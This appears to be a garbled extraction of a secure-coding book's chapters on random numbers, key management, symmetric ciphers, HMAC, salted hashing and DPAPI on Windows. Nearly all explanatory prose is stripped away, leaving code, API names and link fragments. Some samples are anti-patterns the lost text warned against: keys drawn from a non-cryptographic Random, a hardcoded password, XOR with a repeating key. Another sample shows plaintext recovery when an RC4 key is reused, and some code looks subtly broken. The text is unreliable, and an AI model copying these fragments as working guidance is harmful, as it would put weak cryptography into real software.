Cryptography/RNG/Seed

. 81.
Windows 2000 .
,

(Query
PerformanceCounter);
MD4 , 
, . MD4 , 
128 
;
, RDTSC,
RDMSR, RDPMC ( x86 
Web http://developer.intel.com/software/idap/
resources/technical_collateral/pentiumii/RDTSCPM1.HTM);
, 
: Idle Process Time, Io Read Transfer Count, I/O Write Transfer Count, I/O Other
Transfer Count, I/O Read Operation Count, I/O Write Operation Count, I/O Other
Operation Count, Available Pages, Committed Pages, Commit Limit, Peak Commi

227

tment, Page Fault Count, Copy On Write Count, Transition Count, Cache Transition
Count, Demand Zero Count, Page Read Count, Page Read I/O Count, Cache Read
Count, Cache I/O Count, Dirty Pages Write Count, Dirty Write I/O Count, Mapped
Pages Write Count, Mapped Write I/O Count, Paged Pool Pages, Non Paged Pool Pages,
Paged Pool Allocated space, Paged Pool Free Space, Non Paged Pool Allocated Space,
Non Paged Pool Free Space, Free System Page Table Entry, Resident System Code
Page, Total System Driver Pages, Total System Code Pages, Non Paged Pool Lookaside
Hits, Paged Pool Lookaside Hits, Available Paged Pool Pages, Resident System Cache
Page, Resident Paged Pool Page, Resident System Driver Page, Cache/Fast Read with
No Wait, Cache/Fast Read with Wait, Cache/Fast Read Resource Missed, Cache/Fast
Read Not Possible, Cache/Fast Memory Descriptor List Read with No Wait, Cache/
Fast Memory Descriptor List Read with Wait, Cache/Fast Memory Descriptor List Read
Resource Missed, Cache/Fast Memory Descriptor List Read Not Possible, Cache/Map
Data with No Wait, Cache/Map Data with Wait, Cache/Map Data with No Wait Miss,
Cache/Map Data Wait Miss, Cache/PinMapped Data Count, Cache/PinRead with
No Wait, Cache/Pin Read with Wait, Cache/PinRead with No Wait Miss, Cache/Pin
Read Wait Miss, Cache/CopyRead with No Wait, Cache/CopyRead with Wait, Cache/
CopyRead with No Wait Miss, Cache/CopyRead with Wait Miss, Cache/Memory
Descriptor List Read with No Wait, Cache/Memory Descriptor List Read with Wait,
Cache/Memory Descriptor List Read with No Wait Miss, Cache/Memory Descriptor
List Read with Wait Miss, Cache/Read Ahead IOs, Cache/LazyWrite IOs, Cache/Lazy
Write Pages, Cache/Data Flushes, Cache/Data Pages, Context Switches, First Level
Translation Buffer Fills, Second Level Translation buffer Fills System Calls;
, :
Alignment Fix Up Count, Exception Dispatch Count, Floating Emulation Count
Byte Word Emulation Count;
, , : Current
Depth, Maximum Depth, Total Allocates, Allocate Misses, Total Frees, Free Misses,
Type, Tag Size;
, :
Context Switches, Deferred Procedure Call Count, Deferred Procedure Call Rate, Time
Increment, Deferred Procedure Call Bypass Count Asynchronous Procedure Call
Bypass Count;
, : Next
Entry Offset, Number Of Threads, Create Time, User Time, Kernel Time, Image Name,
Base Priority, Unique Process ID, Inherited from Unique Process ID, Handle Count,
Session ID, Page Directory Base, Peak Virtual Size, Virtual Size, Page Fault Count,
Peak Working Set Size, Working Set Size, Quota Peak Paged Pool Usage, Quota Paged
Pool Usage, Quota Peak Non Paged Pool Usage, Quota Non Paged Pool Usage, Page
file Usage, Peak Page file Usage, Private Page Count, Read Operation Count, Write
Operation Count, Other Operation Count, Read Transfer Count, Write Transfer Count
Other Transfer Count.
SHA1, 20
(seed value), 
FIPS 1862, 3.1.

228

II

,
( 
CryptGenRandom Platform SDK). ,
,
, .
CryptGenRandom :

#include <windows.h>
#include <wincrypt.h>
M
HCRYPTPROV hProv = NULL;
BOOL fRet = FALSE;
BYTE pGoop[16];
DWORD cbGoop = sizeof pGoop;
if (CryptAcquireContext(&hProv,
NULL, NULL,
PROV_RSA_FULL,
CRYPT_VERIFYCONTEXT))
if (CryptGenRandom(hProv, cbGoop, &pGoop))
fRet = TRUE;
if (hProv) CryptReleaseContext(hProv, 0);
C++ CCryptRandom ,
CryptAcquireContext ( ) CryptReleaseContext, 

(Cryptographic Service Provider, CSP),
. , CcryptRandom, 
.

/*
CryptRandom.cpp
*/
#include <windows.h>
#include <wincrypt.h>
#include <iostream.h>
class CCryptRandom {
public:
CCryptRandom();
virtual ~CCryptRandom();
BOOL get(void *lpGoop, DWORD cbGoop);
private:
HCRYPTPROV m_hProv;
};
CCryptRandom::CCryptRandom() {
m_hProv = NULL;
CryptAcquireContext(&m_hProv,
NULL, NULL,

229

PROV_RSA_FULL, CRYPT_VERIFYCONTEXT);
if (m_hProv == NULL)
throw GetLastError();
}
CCryptRandom::~CCryptRandom() {
if (m_hProv) CryptReleaseContext(m_hProv, 0);
}
BOOL CCryptRandom::get(void *lpGoop, DWORD cbGoop) {
if (!m_hProv) return FALSE;
return CryptGenRandom(m_hProv, cbGoop,
reinterpret_cast<LPBYTE>(lpGoop));
}
void main() {
try {
CCryptRandom r;
// 10 099.
for (int i=0; i<10; i++) {
DWORD d;
if (r.get(&d, sizeof d))
cout << d % 100 << endl;
}
} catch (...) {
// .
}
}
Secureco2\Chapter08.
, CryptGenRandom,
, !

Crypt
AcquireContext,
, .

FIPS 140-1
FIPS 1401 (Federal Infor
mation Processing Standard) 
.
. FIPS 1401 Web http://
www.microsoft.com/technet/security/FIPSFaq.asp.
, ,
, FIPS 1401.
, rand . CryptGenRandom
Windows 2000 FIPS.

230

II




, , ,
, rand C:

// .
byte[] key = new byte[32];
new Random().NextBytes(key);
, C#, 32
:

using System.Security.Cryptography;
try {
byte[] b = new byte[32];
new RNGCryptoServiceProvider().GetBytes(b);
// .
for (int i = 0; i < b.Length; i++)
Console.Write("{0} ", b[i].ToString("x"));
} catch(CryptographicException e) {
Console.WriteLine(e.Message);
}
RNGCryptoServiceProvider CryptoAPI, Crypt
GenRandom, . Visual Ba
sic .NET :

Imports System.Security.Cryptography
Dim b(32) As Byte
Dim i As Short
Try
Dim r As New RNGCryptoServiceProvider()
r.GetBytes(b)
For i = 0 To b.Length ! 1
Console.Write("{0}", b(i).ToString("x"))
Next
Catch e As CryptographicException
Console.WriteLine(e.Message)
End Try


Web-
ASP.NET ,
, . COM
Web GetRandom Utilities

231

CAPICOM v2. , 
ASP, VBScript (Visual Basic Scrip
ting Edition):

<%
set oCC = CreateObject("CAPICOM.Utilities.1")
strRand = oCC.GetRandom(32,!1)
strRand.
strRand 32 Base64.
%>
: GetRandom CAPICOM 2, 1
. CAPICOM : http://www.microsoft.com/
downloads/release.asp?ReleaseID=39546.




, ,
.
, ,
,
. ,
DES (Data Encryption Standard), 56 . 
DES
0 2561 ( 0 72 057 594 037 927 899). 
ASCII, AZ, az, 09, 
, 
.
, DES , 
, 0 2561.
, 
ASCII, .
, Perl. 2001 .
Fun With Perl (http://www.technofile.org/depts/mlists/
fwp.html)  ,
. :

print map chr 33+rand 93, 0..7.


, , ,
!


(Claude Shannon),
1948 . (A Mathematical

232

II

Theory of Communication), . 
, , 
log2(nm), n
, m . VBSctipt ,
:

Function EntropyBits(iNumValidValues, iPwdSize)


If iNumValidValues <= 0 Then
EntropyBits = 0
Else
EntropyBits = iPwdSize * log(iNumValidValues) / log(2)
End If
End Function
' 8 ,
' A!Z, a!z, 0!9 ( 62 ).
WScript.echo(EntropyBits(62, 8))
C++:

#include <math.h>
#include <stdio.h>
double EntropyBits(double valid, double size) {
return valid ? size * log(valid) / log(2):0;
}
void main() {
printf("%f", EntropyBits(62, 8));
}
!
, ,
. , (Major), 

Maj0r, , 
.
(social engineering).
, , 
 . 
, PIN 24601, 
, .
, . ,
DES 56 
. . 81, 
, 
56 128 .

233

8-1.


56-


128-

PIN

10 (09)

17

40

26 (AZ az)

12

28

52 (AZ az)

10

23

52 (AZ, az 09)

10

22

93 (AZ, az, 09,


)

20

,
, ,
(. 82).

. 82.

! , 
.
, , 

.
http://www.ftp.cl.cam.ac.uk/ftp/users/rja14/tr500.pdf,
The Memorability and Security of Passwords Some Empirical
Results ( 
).

Windows .NET Server 2003 


,
NetValidatePasswordPolicy. C++ Secureco2\Chapter08.
, 
, (Donald Eastlake),
(Jeffrey Schiller) (Steve Crocker) Random

234

II

ness Requirements for Security ( ,


). RFC 1750, 
. 
, drafteastlake
randomness202. .


,
. 
, , 
.
. ,
, 
.

DVD:
, exploit,
, DVD Xing
DVD Player RealNetworks Inc, Xing Technologies.
DVD ,
DeCSS,
DVD. http://www.cnn.com/TECH/computing/9911/05/
dvd.hack.idg.
This1sAPa$sword, , 
,
( Strings), EXE DLL
.
. : .
,  :

// !!!! .
char *szPassword="&162hV1);sWa1";
, ,
? Strings ,
ASCII.  !
. , 
, .
nCipher (http://
www.ncipher.com).
. 
, , , 
SSL/TLS. !
Playing Hide and Seek with Stored Keys ( ) http://
www.ncipher.com/products/rscs/downloads/whitepapers/keyhide2.pdf. nCipher
, .

235


9.

! ,
(RC) .
. , ,
.


: .
, (ephemeral), 
, IPSec, SSL/TLS, RPC DCOM. 
.
, 
(nonrepudiation),
. , SSL/TLS
. ,
, .
,
, 
, . ,
.
, .


. 
, , . 
. ,
DES RC4, . RSA ( 
), ,
. 
(factoring). ,
112 3DES , 512 RSA, 
. , 
, 112
3DES.
Cryptographic Challenges ( 
) Web http://www.rsasecurity.com/rsalabs/challenges.
DES RSA 
.
, ,
, . 

236

II

. 82, Determining Strengths


For Public Keys Used For Exchanging Symmetric Keys ( 
, ) (http://ietf.org/
internetdrafts/draftormanpublickeylengths05.txt).

8-2.

,


RSA,


DSA,

70

947

128

80

1228

145

90

1553

153

100

1926

184

150

4575

279

200

8719

373

250

14596

475

, 80 RSA 
1228 . ,
RSA, 80 .
! 128 AES 512 RSA
.


, 
, ,
. : 
. : 
. : , ,
. , ,
. , ,
, ,
(. 83).
. 83
, . GetKey
EncryptWithKey, Encrypt, DoWork Encrypt
Data. , 
.
. GetKeyHandle 
(handle) , EncryptData.
. 
, .

D.EXE

237

D.EXE

szKey = GetKey("MyKey");

C.EXE

hKey = GetKey("MyKey");

C.EXE
EncryptWithKey(szKey);

B.DLL

EncryptWithKeyHandle(hKey);

B.DLL
Encrypt(szKey);

A.DLL

Encrypt(hKey);

A.DLL
DoWork(szKey);

DoWork(hKey);

EncryptData(szKey);

EncryptData(hKey);

. 83. ,

! , , 
, ,
.

CryptGenKey CryptExportKey
Microsoft CryptoAPI CryptGenKey,
,
.
CryptoAPI, .
, 
, CryptExportKey 
CryptImportKey. 
( ),
( Windows 2000 ). 
(plaintext), . . 
. CryptoAPI,
.
C++, ,
:

238

II

/*
ProtectKey.cpp
*/
#include "stdafx.h"
using namespace std;
// , .
void GetExchangeKey(HCRYPTPROV hProv, HCRYPTKEY *hXKey) {
// .
HCRYPTHASH hHash;
BYTE bKey[16];
if (!GetKeyFromStorage(bKey, sizeof bKey))
throw GetLastError();
if (!CryptCreateHash(hProv, CALG_SHA1, 0, 0, &hHash))
throw GetLastError();
if (!CryptHashData(hHash, bKey, sizeof bKey, 0))
throw GetLastError();
if (!CryptDeriveKey(hProv, CALG_3DES, hHash, CRYPT_EXPORTABLE,
hXKey))
throw GetLastError();
}
void main() {
HCRYPTPROV
hProv = NULL;
HCRYPTKEY hKey = NULL;
HCRYPTKEY hExchangeKey = NULL;
LPBYTE
pbKey = NULL;
try {
if (!CryptAcquireContext(&hProv, NULL, NULL,
PROV_RSA_FULL,
CRYPT_VERIFYCONTEXT))
throw GetLastError();
// 3DES! .
// : CryptoAPI.
if (!CryptGenKey(hProv, CALG_3DES, CRYPT_EXPORTABLE, &hKey))
throw GetLastError();
// , 3DES!.
GetExchangeKey(hProv, &hExchangeKey);
// (BLOB).
DWORD dwLen = 0;
if (!CryptExportKey(hKey, hExchangeKey,
SYMMETRICWRAPKEYBLOB,

239

0, pb Key, &dwLen))
throw GetLastError();
pbKey = new BYTE[dwLen]; // 3DES!.
ZeroMemory(pbKey, dwLen);
if(!pbKey)throwError_NOT_ENOUGH_MEMORY;
// .
if (!CryptExportKey(hKey, hExchangeKey,
SYMMETRICWRAPKEYBLOB, 0, pbKey, &dwLen))
throw GetLastError();
cout << ", " << dwLen
<< " ."
<< endl;
// Key.bin;
// ostream::write()
// <<, NULL!.
ofstream file("c:\\keys\\key.bin", ios_base::binary);
file.write(reinterpret_cast<const char *>(pbKey ), dwLen);
file.close();
} catch(DWORD e) {
cerr << " " << e << hex << " " << e << endl;
}
//
if
if
if
if

.
(hExchangeKey)
CryptDestroyKey(hExchangeKey);
(hKey)
CryptDestroyKey(hKey);
(hProv)
CryptReleaseContext(hProv, 0);
(pbKey)
delete [] pbKey;

}
Secureco2\Chapter08. ,
GetExchangeKey , 
.

, , !
3DES. 3DES ,
. , DES.



. ,
,
. ,
, 
. ,

240

II

(spoofing),
. : 
, , 
.
, 
.
! ,
( !). :
? ,

, .
, .
, 
. ,  , 
( , ),
( 9).

( , 
, , )* . 
, , .
, 
, .
IPSec Windows 2000 . . 84
, 
.

. 84.

,
, ,
sneakernet, sneaker net . . .

241

, , , 
. ,
, . , SSL/TLS IPSec 
. 
, .
: ,
, 
(Diffie Hellman) RSA.
. ,
, .



,  : ,
. ! 
, , 
, , . 
, 
. , :

void EncryptData(char *szKey,


DWORD dwKeyLen,
char *szData,
DWORD dwDataLen) {
for (int i = 0; i < dwDataLen; i++) {
szData[i] ^= szKey[i % dwKeyLen];
}
}
XOR ;
,
. , .
. ,
. : 
, .
XOR , 
, !
* !
! 
, , CryptoAPI, 
Windows. ,
, , (obfuscate)
, , 

encraption, encryption (), crap


. . .

242

II

, 
.

XOR
, XOR, . 
( )
:

A B A = B

. XOR , 
. XOR 
, . 
, !
JScript, CAPICOM,
, .

var
var
var
var

CAPICOM_ENCRYPTION_ALGORITHM_RC2 = 0;
CAPICOM_ENCRYPTION_ALGORITHM_RC4 = 1;
CAPICOM_ENCRYPTION_ALGORITHM_DES = 2;
CAPICOM_ENCRYPTION_ALGORITHM_3DES = 3;

var oCrypto = new ActiveXObject("CAPICOM.EncryptedData");


// .
var strPlaintext = "! ...";
oCrypto.Content = strPlaintext;
// , .
oCrypto.SetSecret(GetKeyFromUser());
oCrypto.Algorithm = CAPICOM_ENCRYPTION_ALGORITHM_3DES;
var strCiphertext = oCrypto.Encrypt(0);
// .
oCrypto.Decrypt(strCiphertext);
if (oCrypto.Content == strPlaintext) {
WScript.echo("!");
}
CAPICOM? COM, 
. 
, , 
. , 
. CAPICOM Windows XP Beta 2 Platform
SDK. Capicom.dll 

243

. DLL
Web http://www.microsoft.com/downloads/release.asp?relea
seid=39546.

!
. , .
Win32 CryptoAPI,
(VBScript, JScript ASP) CAPICOM. .NET
( ASP.NET)
System.Security.Cryptography.


. 
. 256
, ,
, ? 
, . , 
256 , ? 
? , 
. , 
, , .
,
.



(stream cipher) 
, 1 . (RC4 
. 
, ,
CryptoAPI Windows.) , , 
,
. , 
;
. XOR 
, . 
: XOR 
.

, .
(, RSA), ,
. : DES, 3DES, AES (Advan
ced Encryption Standard, DES), IDEA [ Pretty Good

244

II

Privacy (PGP)] RC2 ,


.
64 128 .


, 
. , 13 , 13
. DES, 64 , 13
16 . 3 
, DES 64 . 
, 13 DES , 
5 3 ( , ), 
8 .
, , , 
, !
 .
RC4 10 DES.
, . 
.


, 
.
, , .
,
.
, 
. ,
.  
. 
,
XOR . ,
, . , , .

: , 
. , 23 
, 23 .
, , 
CryptoAPI:

/*
RC4Test.cpp
*/
#define MAX_BLOB 50
BYTE bPlainText1[MAX_BLOB];
BYTE bPlainText2[MAX_BLOB];
BYTE bCipherText1[MAX_BLOB];

245

BYTE bCipherText2[MAX_BLOB];
BYTE bKeyStream[MAX_BLOB];
BYTE bKey[MAX_BLOB];
//////////////////////////////////////////////////////////////////
// 2
// .
void Setup() {
ZeroMemory(bPlainText1, MAX_BLOB);
ZeroMemory(bPlainText2, MAX_BLOB);
ZeroMemory(bCipherText1, MAX_BLOB);
ZeroMemory(bCipherText2, MAX_BLOB);
ZeroMemory(bKeyStream, MAX_BLOB);
ZeroMemory(bKey, MAX_BLOB);
strncpy(reinterpret_cast<char*>(bPlainText1),
", 6 .", MAX_BLOB!1);
strncpy(reinterpret_cast<char*>(bPlainText2),
" .", MAX_BLOB!1);
strncpy(reinterpret_cast<char*>(bKey),
GetKeyFromUser(), MAX_BLOB!1);

// .

}
//////////////////////////////////////////////////////////////////
// Encrypt RC4.
void Encrypt(LPBYTE bKey,
LPBYTE bPlaintext,
LPBYTE bCipherText,
DWORD dwHowMuch) {
HCRYPTPROV hProv;
HCRYPTKEY hKey;
HCRYPTHASH hHash;
/*
:
.
"".
, !.
3 .
.
4 .
*/
DWORD dwBuff = dwHowMuch;
CopyMemory(bCipherText, bPlaintext, dwHowMuch);
if (!CryptAcquireContext(&hProv, NULL, NULL, PROV_RSA_FULL,
CRYPT_VERIFYCONTEXT))
throw;

246

II

if (!CryptCreateHash(hProv, CALG_MD5, 0, 0, &hHash))


throw;
if (!CryptHashData(hHash, bKey, MAX_BLOB, 0))
throw;
if (!CryptDeriveKey(hProv, CALG_RC4, hHash,
CRYPT_EXPORTABLE,
&hKey))
throw;
if (!CryptEncrypt(hKey, 0, TRUE, 0,
bCipherText,
&dwBuff,
dwHowMuch))
throw;
if (hKey) CryptDestroyKey(hKey);
if (hHash) CryptDestroyHash(hHash);
if (hProv) CryptReleaseContext(hProv, 0);
}
void main() {
Setup();
// bKey.
try {
Encrypt(bKey, bPlainText1, bCipherText1, MAX_BLOB);
Encrypt(bKey, bPlainText2, bCipherText2, MAX_BLOB);
} catch (...) {
printf(" ! %d", GetLastError());
return;
}
// "".
// .
for (int i = 0; i < MAX_BLOB; i++) {
BYTE c1 = bCipherText1[i];
//
BYTE p1 = bPlainText1[i];
//
BYTE k1 = c1 ^ p1;
// .
BYTE p2 = k1 ^ bCipherText2[i]; //
// .
printf("%c", p2);
}
}
Secureco2\Chapter08. 
,
!

, . 
, XOR,
XOR . :

247

. 
. , E, T
A. , (
) . (, , .)

, 
(DES 3DES). 
. ,
( ) .
 . ,
,
,
.

,

, : 
, ! , 
, 
. 
(salt) , , 
. 
.
UNIX 
. 
( /etc/passwd).
. 
, ! Windows
, Windows 2000
, 
. Windows NT 4.0 SP 3 
Syskey ( ).
CryptoAPI,
.

if (!CryptCreateHash(hProv, CALG_MD5, 0, 0, &hHash))


throw;
if (!CryptHashData(hHash, bKey, MAX_BLOB,0))
throw;
if (!CryptHashData(hHash, bSalt, cbSaltSize, 0))
throw;
if (!CryptDeriveKey(hProv, CALG_RC4,
hHash, CRYPT_E XPORTABLE,
&hKey))
throw;

248

II

; 
, .
! .
, 
, 
.
, 
. 
, . 
,
, .

,
, .

.NET Framework .
, ,
.


, , ,

XOR , 
.  (bit
flip). 1
, , . ,
, .
, , :

hh:mm dd!mmm!yyyy. bbbbbbbbbbbbbbbbbbbbbbbbbbbb


hh 24 , mm , dd , mmm 
, , yyyy , bbbbb 
. (Squirt) (Major) . 
:

16:00 03!Sep!2004. . .
, , 
.
,
3 2004 4 . , , ,
, .

( , ) 

249

, , . 
( 16:00),
. !



( ).
. , 
, ,
. , .
, , 
, . 85.

, ,

,

. 85. ,

: ,
, 
. , 
.
.


(keyed hash) 
, .

.
, .

(message authentication code, MAC). Web
What are Message Authentication Codes ( 
) (http://www.rsasecurity.com/rsalabs/
faq/217.html).

250

II

. 86 .

MAC


MAC
MAC-

. 86.

MAC-

, . 
, , 
.


, , 
. . 
!


. (1),
(2), 1,
, 2, . 1,
.

2 1
, 
(, ). : 
!


CryptoAPI, .NET Framework 
. CryptoAPI,
HMAC (HashBased Message Authentication Code).
Secureco2\Chapter08\MAC. HMAC RFC 2104
(http://www.ietf.org/rfc/rfc2104.txt).

/*
MAC.cpp
*/
#include "stdafx.h"

DWORD HMACStuff(void *szKey, DWORD cbKey,


void *pbData, DWORD cbData,
LPBYTE *pbHMAC, LPDWORD pcbHMAC) {
DWORD dwErr = 0;
HCRYPTPROV hProv;
HCRYPTKEY hKey;
HCRYPTHASH hHash, hKeyHash;
try {
if (!CryptAcquireContext(&hProv, 0, 0,
PROV_RSA_FULL, CRYPT_VERIFYCONTEXT))
throw;
// .
if (!CryptCreateHash(hProv, CALG_SHA1, 0, 0, &hKeyHash))
throw;
if (!CryptHashData(hKeyHash, (LPBYTE)szKey, cbKey, 0))
throw;
if (!CryptDeriveKey(hProv, CALG_DES,
hKeyHash, 0, &hKey))
throw;
// !.
if(!CryptCreateHash(hProv, CALG_HMAC, hKey, 0, &hHash))
throw;
HMAC_INFO hmacInfo;
ZeroMemory(&hmacInfo, sizeof(HMAC_INFO));
hmacInfo.HashAlgid = CALG_SHA1;
if(!CryptSetHashParam(hHash, HP_HMAC_INFO,
(LPBYTE)&hmacInfo,
0))
throw;
// HMAC .
if(!CryptHashData(hHash, (LPBYTE)pbData, cbData, 0))
throw;
// HMAC.
DWORD cbHMAC = 0;
if(!CryptGetHashParam(hHash, HP_HASHVAL, NULL, &cbHMAC, 0))
throw;
// .
*pcbHMAC = cbHMAC;
*pbHMAC = new BYTE[cbHMAC];

251

252

II

if (NULL == *pbHMAC)
throw;
if(!CryptGetHashParam(hHash, HP_HASHVAL, *pbHMAC, &cbHMAC, 0))
throw;
SetLastError()
} catch(...) {
dwErr = GetLastError();
printf(" ! %d\n", GetLastError());
}
if
if
if
if

(hProv)
(hKeyHash)
(hKey)
(hHash)

CryptReleaseContext(hProv, 0);
CryptDestroyKey(hKeyHash);
CryptDestroyKey(hKey);
CryptDestroyHash(hHash);

return dwErr;
}
void main() {
// .
char *szKey = GetKeyFromUser();
DWORD cbKey = lstrlen(szKey);
if (cbKey == 0) {
printf(" .\n");
return !1;
}
char *szData = "! ...";
DWORD cbData = lstrlen(szData);
// HMAC pbHMAC.
// HMAC ! cbHMAC .
LPBYTE pbHMAC = NULL;
DWORD cbHMAC = 0;
DWORD dwErr = HMACStuff(szKey, cbKey,
szData, cbData,
&pbHMAC, &cbHMAC);
// ! pbHMAC.
delete [] pbHMAC;
}
.NET Framework , ,
, .

HMACSHA1 hmac = new HMACSHA1();


hmac.Key = key;
byte [] hash = hmac.ComputeHash(message);

253

key () message ()  
, hash HMAC.
! ,
.NET Framework. ,
.


MAC,
:
. MAC
;
MAC ;
(nonrepu
diation) ( ). MAC
,
MAC;
, MAC ( ).
, 
, , MAC. 
. 87.

. 87.

, ,
( , 
, , !). 
.

254

II

CAPICOM
. VBScript , 
:

strText = " $42,69."


Set oDigSig = CreateObject("CAPICOM.SignedData")
oDigSig.Content = strText
fDetached = TRUE
signature = oDigSig.Sign(Nothing, fDetached)
oDigSig.Verify signature, fDetached
. ,
.
. (detached) ,
, . ,
.
.NET Framework . ,
,
CryptoAPI, CryptoAPI CAPICOM 
, System.Security.Cryptography.X509Cer
tificates CryptoAPI.
.NET Framework Security ( .NET Framework) (AddisonWesley Profes
sional, 2002) (. ). 
, , .NET
Framework (Common Language Runtime).
! , MAC 
,
. , , 

.

! 
MAC .




, . 
. .
, , 
, . ( 
, 
.) : 
, , !
:

255

1. ;
2. ;
3. .
. , 
 :
1. ;
2. ;
3. .
! 
IIS 4. , SSL
, 
. 
: (, , )
. , , .
, . Web
http://www.microsoft.com/technet/security/bulletin/MS99053.asp.
, ,
, .
, , ,
,  , 
. :

char *bCiphertext = new char[cbCiphertext];


ZeroMemory(bCiphertext, cbCiphertext);
SSLEncryptData(bPlaintext, cbPlaintext, bCiphertext, cbCiphertext);
SSLSend(socket, bCiphertext, cbCiphertext);
ZeroMemory(bCiphertext, cbCiphertext);
delete [] bCipherText;

. 
.



, , 
. . 83 , , ,
.

256

II

8-3.


RC2, RC4, DES, 3DES, AES
( Rijndael)


SHA1, SHA256, SHA384, SHA512,

MD4, MD5, HMAC,
, RSA DSS, XML DSig
MAC




. , 
, . ,
, ,
,
.
 , , 
: MD4 MD5. 
? . ,
. , MD4 MD5 
, . ,
, .


, 
, 
.

, 
API
. . 
. , 
? , 
, .


, , 
, . , 
,
.
, .
, ,
. , 
, 
. : , ,
( ) ,
, 
Microsoft Windows, ,
,
, ,
.
, 
(persistent) . (ephemeral) ,
, . 
SSL/TLS, IPSec, RPC DCOM
. .
! .
, 
. : , 
, .

258

II


, :
( ) . 
, . , , 
Blake, Blake.
, (spoofing) .
, 
, , 
. 
, , . 
, ?
? ? ,
.
, , ,
. (, , ?) ,
, 
, .
.  
() .
,
, . . 
Windows NT
, Debug programs (
). Microsoft Platform SDK
SeDebugPrivilege SE_DEBUG_NAME.
, .
.

. Pagefile.sys,
. 
: Hiberfil.sys, 
, . 
, , 
, (, Dr. Wat
son) . ,
.
: , 
, , .
, , , ,
.


,
( ), ,
(verifier),

259

. ,
,
, , , .
, . 
,
( ) .


 (hash function), (digest function),
,

. ,
, . 
128 160 , . ,
RSA Data Security Inc. MD5
128 , SHA1 [ 
(National Institute of Standards and Technology, NIST)
(National Security Agency, NSA)]
160 . (  SHA1.
NIST SHA1: SHA256, SHA384
SHA512. Microsoft CryptoAPI MD4, MD5 SHA1, .NET
Framework MD5, SHA1, SHA256, SHA384 SHA512. ( 
SHA Web csrc.nc
sl.nist.gov/cryptval/shs.html.)
, 
,
.
( .
, , 
.) , 
, .


, . 
(salt) , 
, 
. (dictionary attack)
, , 
, . 
,

(
8).

CryptoAPI . C/C++:

260

II

// .
if (!CryptCreateHash(hProv, CALG_SHA1, 0, 0, &hHash))
throw GetLastError();
if (!CryptHashData(hHash, (LPBYTE)bSecret, cbSecret, 0))
throw GetLastError();
if (!CryptHashData(hHash, (LPBYTE)bSalt, cbSalt, 0))
throw GetLastError();
// .
DWORD cbSaltedHash = 0;
DWORD cbSaltedHashLen = sizeof (DWORD);
if (!CryptGetHashParam(hHash, HP_HASHSIZE, (BYTE*)&cbSaltedHash,
&cbSaltedHashLen, 0))
throw GetLastError();
// .
BYTE *pbSaltedHash = new BYTE[cbSaltedHash];
if (NULL == *pbSaltedHash) throw;
if(!CryptGetHashParam(hHash, HP_HASHVAL, pbSaltedHash,
&cbSaltedHash, 0))
throw GetLastError();
, C#:

using System;
using System.Security.Cryptography;
using System.IO;
using System.Text;
...
static byte[] HashPwd(byte[] pwd, byte[] salt) {
SHA1 sha1 = SHA1.Create();
UTF8Encoding utf8 = new UTF8Encoding();
CryptoStream cs =
new CryptoStream(Stream.Null, sha1, CryptoStreamMode.Write);
cs.Write(pwd,0,pwd.Length);
cs.Write(salt,0,salt.Length);
cs.FlushFinalBlock();
return sha1.Hash;
}
Secureco2\Chapter09\Sal
tedHash. , , : 
, , 
. CryptGetHashParam 
Windows API 
, , .
, . 
, , 
(). ,
, .

261

. 
.

PKCS #5
, 

.
PKCS #5 (PublicKey Cryptography Standard).
, RSA Data Security 
, Microsoft, Apple Sun Microsystems. PKCS #5
RFC 2898 (http://www.ietf.org/rfc/rfc2898.txt).
PKCS#5
. , , PBKDF1 (Password
Based Key Derivation Function #1) PKCS #5. 
, PBKDF2, : 
. , PKCS #5, 
PBKDF1.
PKCS #5 , 
.
, 
.
, , ,
PKCS #5.
,
.
1.  .
2. .
3. .
4. .
5.  PKCS #5.
, 64 , ,
, 264 ( 263,
, ,
). , .
, 
PKCS #5. ,
PKCS #5 . 
,
, .
C#
:

static byte[] DeriveBytes(string pwd, byte[] salt, int iter) {


PasswordDeriveBytes p =
new PasswordDeriveBytes(pwd,salt,"SHA1",iter);
return p.GetBytes(16);
}

262

II

: CryptoAPI Windows 
PKCS #5, CryptDeriveKey, 
.
,
.
! :
! , PKCS #5
 , ,
.

.
, 

. ? , ,
.
, ,
.



, . 
, ,
,
. 
. ,
, (
) , 
. 
,
.

Windows 2000

Windows 2000 
CryptProtectData CryptUnprotectData API DPAPI (Data Protection
API). DPAPI :

. CRYPTPROTECT_LO
CAL_MACHINE dwFlags,
ACL , , , 
DPAPI. , 
Accounting (), ACL
:

263

Administrators: Full Control (: );


Accounting: Read ().
DPAPI 
, 
. 
CryptProtectData, , 
, . 
LoadUserProfile. ,

.

,
CRYPTPROTECT_LOCAL_MACHINE.
CryptProtectData 
MAC.
! , DPAPI (, 
, ), ,
. : 
, .

DPAPI
. DPAPI 
, ?
. . CryptProtectData CRYPTPROTECT_LO
CAL_MACHINE ,
. , 
, CryptProtectData. 
, 
(ACL), 
pOptionalEntropy.

DPAPI
. ( ) 
, ?
. 
, , 
, . 
CryptProtecData pOptionalEntropy 
, , 
.
, CryptUnprotectData
, !

264

II

( 16 ), 
/ 
.

! CRYPTPROTECT_LOCAL_MA
CHINE, .
, 
,
.
, , 
SYSTEM, Windows 2000/XP LsaStore
PrivateData LsaRetrievePrivateData API 
LSA. 
, LSA 4096 ,
(2048) . , 
. DPAPI. LSA
Windows NT 4.
, 
DPAPI ( Secureco2\Chap
ter09\DPAPI).

// .
DATA_BLOB blobIn;
blobIn.pbData = reinterpret_cast<BYTE *>("This is my secret data.";
blobIn.cbData = lstrlen(reinterpret_cast<char *>(blobIn.pbData))+1;
// .
DATA_BLOB blobEntropy;
blobEntropy.pbData = GetEntropyFromUser();
blobEntropy.cbData = lstrlen(
reinterpret_cast<char *>(blobEntropy.pbData));
// .
DATA_BLOB blobOut;
DWORD dwFlags = CRYPTPROTECT_AUDIT;
if(CryptProtectData(
&blobIn,
L"Writing Secure Code Example",
&blobEntropy,
NULL,
NULL,
dwFlags,
&blobOut))
{
printf(" .\n");
} else {
printf(" CryptProtectData() !> %x",
GetLastError());

265

exit(!1);
}
// .
DATA_BLOB blobVerify;
if (CryptUnprotectData(
&blobOut,
NULL,
&blobEntropy,
NULL,
NULL,
0,
&blobVerify)) {
printf(" : %s\n", blobVerify .pbData);
} else {
printf(" CryptUnprotectData() ! > %x",
GetLastError());
exit(!1);
}
LocalFree(blobOut.pbData);
LocalFree(blobVerify.pbData);
DPAPI Web
http://msdn.microsoft.com/library/enus/dnsecure/html/windatapro
tectiondpapi.asp.

: Windows XP
Windows XP Stored User Names and Passwords (
),
(
) . 
, ,
. :
,
;
DPAPI;

,
.
Stored User Names and Passwords :
Windows .
, Kerberos.

SSPI (Security Support Provider Interface).
, ,

266

II

,

